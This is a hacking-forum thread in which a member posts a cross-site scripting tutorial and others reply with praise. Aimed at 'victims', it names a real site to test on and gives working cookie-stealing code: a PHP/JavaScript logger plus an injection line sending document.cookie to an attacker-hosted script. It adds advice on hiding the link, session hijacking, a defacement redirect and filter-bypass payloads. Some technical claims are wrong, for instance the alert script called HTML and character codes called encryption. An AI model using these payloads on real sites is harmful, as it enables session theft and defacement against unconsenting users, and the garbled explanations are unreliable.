Author Topic: Basic xss tutorial


Offline Phage

  • VIP
  • Overlord
  • *
  • Posts: 1280
  • Cookies: 120
Basic xss tutorial
« on: June 18, 2012, 02:52:29 pm »

What is XSS?

XSS stands for Cross-Site Scripting and is a web hacking method where you inject HTML or JavaScript into a web page. This attack can be done by submitting queries into text boxes or simply in the URL. The result is that the website reads your query and executes it. XSS is a very powerful method; it can be used to steal someone's cookies, like your best friend's, the web administrator :) Or you can use some social engineering to manipulate people into downloading a virus that you have created, such as a botnet, RAT or even a keylogger. XSS can be a very powerful attack method but can also be very mild. Most XSS attacks are mild. You can use an alert box to show that the site is vulnerable; you can do this to show the admin that his site is vulnerable. I'm going to give you a few examples of what XSS can be used for and how powerful XSS can be.



What is HTML?

HTML stands for HyperText Markup Language and is the main markup language of websites. HTML is much like a programming language: they are both languages that are used to create attributes and events. You can use HTML to create forms, buttons and other things that can be used in a web page. I highly doubt you will ever encounter a website that does not contain even a slight amount of HTML.



What is Javascript?

First of all, there is a HUGE difference between JavaScript and Java. Java is a programming language that is fairly similar to C++ and is used to create games and applications. JavaScript isn't used nearly as much as HTML. It is used more in applications outside of the website. JavaScript can be an incredibly useful language along with HTML, and they are both languages you can't get past if you want to master XSS or hack websites.



Your first xss attack

In this section I will teach you how to perform an XSS attack and how to find XSS vulnerabilities. If you already know the basics of XSS you can skip this part.

So where can you find XSS vulnerabilities? They are found in search boxes, URLs, signup forms etc. Basically in every text area where you can input something.
I will use this site as an example: http://www.leksikon.org/ . On the site you can see a search box, and that is where you are going to make your first XSS attack. So let's take the most used basic query of all time and paste it in the search box.

Code:
<script>alert("xss")</script>

That little script is HTML and will basically make an alert box saying xss. If you get a pop-up box saying "xss", you have successfully performed your first XSS attack. You can make it say something else by simply editing the part that says "xss".
Example:

Code:
<script>alert("your text goes here")</script>

But what if nothing happens? Don't worry, that just means the website has taken some time to put a filter on it. That means they have installed a filter that checks for malicious (dangerous) content, like HTML and JavaScript. It will therefore block the script and prevent it from executing.
But fortunately there are methods to bypass the filter. We can do that by encrypting the script. We will be using a little function called "String.fromCharCode". It will encrypt the script into ASCII. An example of this could be:

Code:
<script>alert(String.fromCharCode(88,83,83))</script>

That script does exactly the same thing as this script:

Code:
<script>alert("xss")</script>



Advanced xss

In this section I will show you how to use XSS in malicious ways. But remember, all malicious attacks sent to a website, server etc. are illegal and can be prosecuted. I will not be responsible for what you use this information for.


Cookie logger:

A cookie logger is used to log the target's cookies in a .txt file. This is the most malicious thing we can do with a non-persistent XSS. The way I am going to show you is a three-step method. First, set up an account on a free hosting service. Personally I find www.000webhost.com the best. Once you have done that, create a file in the root folder and call it CookieLogger.txt; leave the text file empty. It is in that file the cookie logger will save the cookies it logs. Now create another file called CookieLogger.php (remember the extension .php). In that file insert this code:

Code:
<?php
/**
 * Created on 16. april. 2007
 * Created by Audun Larsen (audun@munio.no)
 *
 * Copyright 2006 Munio IT, Audun Larsen
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
 * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
 * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
 * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
 * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
 * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

// Mode 1: called with a query string (for example ?cookie=...): append the
// URL-decoded query string to the log file and send nothing back.
if (strlen($_SERVER['QUERY_STRING']) > 0) {
    // Log file name matches the empty file created in the step above.
    $fp = fopen('./CookieLogger.txt', 'a');
    fwrite($fp, urldecode($_SERVER['QUERY_STRING']) . "\n");
    fclose($fp);
} else {
// Mode 2: called without a query string (for example via <script src=...>):
// emit JavaScript that sends the visitor's cookies back to this same script.
?>
var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>';

// ==
//  URLEncode and URLDecode functions
//
// Copyright Albion Research Ltd. 2002
// http://www.albionresearch.com/
//
// You may copy these functions providing that
// (a) you leave this copyright notice intact, and
// (b) if you use these functions on a publicly accessible
//  web site you include a credit somewhere on the web site
//  with a link back to http://www.albionresearch.com/
//
// If you find or fix any bugs, please let us know at albionresearch.com
//
// SpecialThanks to Neelesh Thakur for being the first to
// report a bug in URLDecode() - now fixed 2003-02-19.
// And thanks to everyone else who has provided comments and suggestions.
// ==
function URLEncode(str)
{
    // The Javascript escape and unescape functions do not correspond
    // with what browsers actually do...
    var SAFECHARS = "0123456789" +                  // Numeric
                    "ABCDEFGHIJKLMNOPQRSTUVWXYZ" +  // Alphabetic
                    "abcdefghijklmnopqrstuvwxyz" +
                    "-_.!~*'()";                    // RFC2396 Mark characters
    var HEX = "0123456789ABCDEF";
    var plaintext = str;
    var encoded = "";
    for (var i = 0; i < plaintext.length; i++) {
        var ch = plaintext.charAt(i);
        if (ch == " ") {
            encoded += "+";  // x-www-urlencoded, rather than %20
        } else if (SAFECHARS.indexOf(ch) != -1) {
            encoded += ch;
        } else {
            var charCode = ch.charCodeAt(0);
            if (charCode > 255) {
                alert("Unicode Character '" + ch + "' cannot be encoded using standard URL encoding.\n" +
                      "(URL encoding only supports 8-bit characters.)\n" +
                      "A space (+) will be substituted.");
                encoded += "+";
            } else {
                encoded += "%";
                encoded += HEX.charAt((charCode >> 4) & 0xF);
                encoded += HEX.charAt(charCode & 0xF);
            }
        }
    } // for
    return encoded;
};

// Send the cookies as the query string of an image request to this script,
// which then hits Mode 1 above and logs them.
cookie = URLEncode(document.cookie);
html = '<img src="' + ownUrl + '?' + cookie + '">';
document.write(html);
<?php
}
?>


Once you have done that you can send the script to your victim, and it will log the victim's cookies.
This is the script you shall add to your XSS vulnerability:
Code:
<script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script>

I would definitely recommend you to TinyURL the link, otherwise it will not be hard for the victim to guess what is going on.
Once you have got the cookies you can use a Firefox addon called "Cookie Manager" to manipulate and edit the cookie so you can hijack the victim's session.



Defacing with xss

Defacing is often what people do when they have admin privileges to a website. This is often done to show the admin that the security has been breached. If you want to deface with HTML you shall find a persistent XSS in the site. Once you have found your persistent XSS vulnerability you want it to redirect to your deface page. I would highly recommend you to upload your deface page to www.pastehtml.com since it has anonymous upload. The script you shall use to redirect to your deface page is:

Code:
<script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script>



Techniques to bypass xss filters

Sometimes the basic script doesn't do the trick. That's because the website has a WAF or filter installed. What it does is block as many XSS and SQLi queries as it can. There are many ways of bypassing the filter, but I will only cover three of them. If none of these techniques work, drop me a PM and I will take a look at it.

Hex bypassing:

This is one of the easiest filter bypassing techniques. If the site blocks characters like >, < and / you can use this method to bypass it. The hex of a certain character is basically the same character in a different format. The hex for the characters mentioned above goes like this:

< = %3c
> = %3e
/ = %2f


ASCII bypassing:

If the website blocks this character " you can use ASCII encryption to bypass it. This is one of the most common XSS filter bypass techniques of all time. Here is an example of how it works. Let's take this script as an example:

Code:
<script>alert("xss")</script>

After we have encrypted it, it will look like this:

Code:
<script>alert(String.fromCharCode(88,83,83))</script>

To encrypt your scripts go to this site:
http://www.wocares.com/noquote.php

You can also install a Firefox addon called HackBar. It's a tool that I'm sure you will find very useful when dealing with website hacking.



Case-sensitive bypassing:

Well, this method will rarely work, but it's worth a shot. Some filters, some very old ones, can be bypassed by writing a script with different cases of characters. An example of this would go like this:

Code:
<sCrIpT>aLeRt("xss")</sCrIpT>


You can mix it with ASCII if you want.


First of all, thanks for reading this. I hope this has taught you the basics of XSS. I'm going to make some more advanced XSS tutorials later, but for now I hope this will be enough. If you have any questions related to XSS, drop me a PM and I will be glad to help you out.
« Last Edit: June 19, 2012, 11:08:47 am by Narraz »
"Ruby devs do, in fact, get all the girls. No girl wants a python, but EVERY girl wants rubies" - connection

"It always takes longer than you expect, even when you take into account Hofstadter’s Law."

Offline Conch

  • Serf
  • *
  • Posts: 44
  • Cookies: 8
  • ls -a /dev/null | grep Conch
Re: [TUT] Basic xss tutorial [TUT]
« Reply #1 on: June 18, 2012, 03:32:55 pm »
Wow, really nice tutorial.
I skimmed through it, and it looks nice.
I'm going to read it all now and bookmark it :)

Offline Phage

  • VIP
  • Overlord
  • *
  • Posts: 1280
  • Cookies: 120
Re: [TUT] Basic xss tutorial [TUT]
« Reply #2 on: June 18, 2012, 06:08:37 pm »
Wow, really nice tutorial.
I skimmed through it, and it looks nice.
I'm going to read it all now and bookmark it :)

Thank you very much, I'm really appreciating it !

Offline lordarnoud

  • Peasant
  • *
  • Posts: 112
  • Cookies: 6
Re: [TUT] Basic xss tutorial [TUT]
« Reply #3 on: June 18, 2012, 06:29:45 pm »
I've read your tutorial and in my opinion it was easy to follow and made sense :) I'm not an expert on XSS so I'm not sure if everything you said is correct or complete but yeah :D thanks for the tutorial :)

Offline Phage

  • VIP
  • Overlord
  • *
  • Posts: 1280
  • Cookies: 120
Re: [TUT] Basic xss tutorial [TUT]
« Reply #4 on: June 18, 2012, 07:04:30 pm »
I've read your tutorial and in my opinion it was easy to follow and made sense :) I'm not an expert on XSS so I'm not sure if everything you said is correct or complete but yeah :D thanks for the tutorial :)

Thank you, i have really tried to make it as easy as possible.

Offline Axon

  • VIP
  • King
  • *
  • Posts: 2047
  • Cookies: 319
Re: [TUT] Basic xss tutorial [TUT]
« Reply #5 on: June 19, 2012, 01:20:00 am »

Offline Phage

  • VIP
  • Overlord
  • *
  • Posts: 1280
  • Cookies: 120
Re: [TUT] Basic xss tutorial [TUT]
« Reply #6 on: June 19, 2012, 01:29:37 am »
http://www.hackcommunity.com/Thread-TUT-Basic-xss-tutorial-TUT

Did you snatch it from this forum?

Dude, that is me. The reason that I do not have the same name is that I can't change it in here :)

I would never steal someone's work and not give them credit for it!

Here is proof if you don't believe me:
http://i.imgur.com/pqCbQ.png

Best regards
Narraz,  Anima Templi
« Last Edit: June 19, 2012, 01:52:39 am by Narraz »

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
Re: Basic xss tutorial
« Reply #7 on: June 19, 2012, 11:07:30 am »
You don't need to tag your subject with [TUT] tags when the topic is in a tutorial board; even the word tutorial is not really necessary. Nonetheless, the tutorial looks okay at first glance. I will read it more carefully once I have time, probably a few days.
if($statement) { unless(!$statement) { // Very sure } }
https://evilzone.org/?hack=true

Offline Phage

  • VIP
  • Overlord
  • *
  • Posts: 1280
  • Cookies: 120
Re: Basic xss tutorial
« Reply #8 on: June 19, 2012, 11:10:49 am »
You don't need to tag your subject with [TUT] tags when the topic is in a tutorial board; even the word tutorial is not really necessary. Nonetheless, the tutorial looks okay at first glance. I will read it more carefully once I have time, probably a few days.

Thank you, I hope you will find it useful.

Offline _SpyMachine

  • Serf
  • *
  • Posts: 36
  • Cookies: 0
Re: Basic xss tutorial
« Reply #9 on: June 20, 2012, 02:41:57 am »
Awesome!


I must have seen a thousand XSS scripting tutorials, but none of them ever actually seem to get past <script>alert('xss')</script>  ::) .  This actually went in depth and showed how you can exploit the victim. kudos!


For people who read that and sort of understood it, I would really suggest just setting up your own fake website that is susceptible to XSS and learn how to exploit it.  This will really teach you one, how XSS really works, and two, how you can defend against it.
"And it's so sad to see the world agree
That they'd rather see their faces fill with flies
All when I'd want to keep white roses in their eyes"

Offline Phage

  • VIP
  • Overlord
  • *
  • Posts: 1280
  • Cookies: 120
Re: Basic xss tutorial
« Reply #10 on: June 20, 2012, 03:38:59 pm »
Awesome!


I must have seen a thousand XSS scripting tutorials, but none of them ever actually seem to get past <script>alert('xss')</script>  ::) .  This actually went in depth and showed how you can exploit the victim. kudos!


For people who read that and sort of understood it, I would really suggest just setting up your own fake website that is susceptible to XSS and learn how to exploit it.  This will really teach you one, how XSS really works, and two, how you can defend against it.

Thank you, I have put a lot of work into it, and I'm happy to see you like it.

Offline ande

  • Owner
  • Titan
  • *
  • Posts: 2664
  • Cookies: 256
Re: Basic xss tutorial
« Reply #11 on: July 15, 2012, 01:49:13 pm »
Alright, just read it in depth.

The tutorial is just fine; it's not exactly how I would have written it but not far from, not that my way of writing it would be the correct answer anyway. The only thing that annoys me is the grammatical errors, not typos but just structure-wise wrong. Not a big problem though. It is easy to understand nonetheless.

Like I said, there are a couple of things I would have done differently. So perhaps I will use this as a base if I ever get the time to write one myself. I will of course credit you for it hehe.


I am looking forward to reading more from you ;)

Offline Phage

  • VIP
  • Overlord
  • *
  • Posts: 1280
  • Cookies: 120
Re: Basic xss tutorial
« Reply #12 on: July 16, 2012, 03:46:08 am »
Alright, just read it in depth.

The tutorial is just fine; it's not exactly how I would have written it but not far from, not that my way of writing it would be the correct answer anyway. The only thing that annoys me is the grammatical errors, not typos but just structure-wise wrong. Not a big problem though. It is easy to understand nonetheless.

Like I said, there are a couple of things I would have done differently. So perhaps I will use this as a base if I ever get the time to write one myself. I will of course credit you for it hehe.


I am looking forward to reading more from you ;)

I'm currently working on a website so I didn't have the time to check it for grammatical errors. But this is something that I will take a look at when my website is online. I have actually just finished a tutorial on basic SQL injection; I'm planning to release it soon. I would actually like to see how you would write it :)

regards
Narraz